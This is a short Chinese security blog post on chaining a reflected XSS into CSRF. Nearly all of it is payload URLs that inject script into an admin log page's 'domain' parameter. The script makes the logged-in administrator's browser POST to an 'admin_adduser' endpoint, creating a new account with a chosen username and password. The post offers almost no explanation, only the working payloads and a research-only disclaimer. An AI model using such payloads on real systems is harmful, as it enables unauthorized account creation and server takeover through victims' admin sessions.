xss利用csrf漏洞

颓废
颓废
颓废
441
文章
0
评论
2019年5月19日10:43:57评论479 views字数 1347阅读4分29秒阅读模式
摘要

xss漏洞

比如说

xss漏洞 

https://www.0dayhack.com/admin_loglist.html?domain=<script>alert(xss)</script>

结合跨站漏洞 

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('目标地址','数据', "post")</script>

比如说 

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('admin_adduser','domain=netfairy.net&user={"username":"tadcdacest","password":"addscdamin","oldpassword":"","max_download":"0","max_upload":"0","max_download_account":"0","max_upload_account":"0","max_connection":"0","connect_timeout":"5","idle_timeout":"5","connect_per_ip":"0","pass_length":"0","show_hidden_file":0,"change_pass":0,"send_message":0,"ratio_credit":"0","ratio_download":"1","ratio_upload":"1","ratio_count_method":0,"enable_ratio":0,"current_quota":"0","max_quota":"0","enable_quota":0,"note_name":"","note_address":"","note_zip":"","note_phone":"","note_fax":"","note_email":"","note_memo":"","ipmasks":[],"filemasks":[],"directories":[],"usergroups":[],"subdir_perm":[],"enable_schedule":0,"schedules":[],"limit_reset_type":"0","limit_enable_upload":0,"cur_upload_size":"0","max_upload_size":"0","limit_enable_download":0,"cur_download_size":"0","max_download_size":"0","enable_expire":0,"expiretime":"2017-04-12 10:42:40","protocol_type":63,"enable_password":1,"enable_account":1,"ssh_pubkey_path":"","enable_ssh_pubkey_auth":0,"ssh_auth_method":0}', "post")</script>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:43:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xss利用csrf漏洞https://cn-sec.com/archives/68575.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息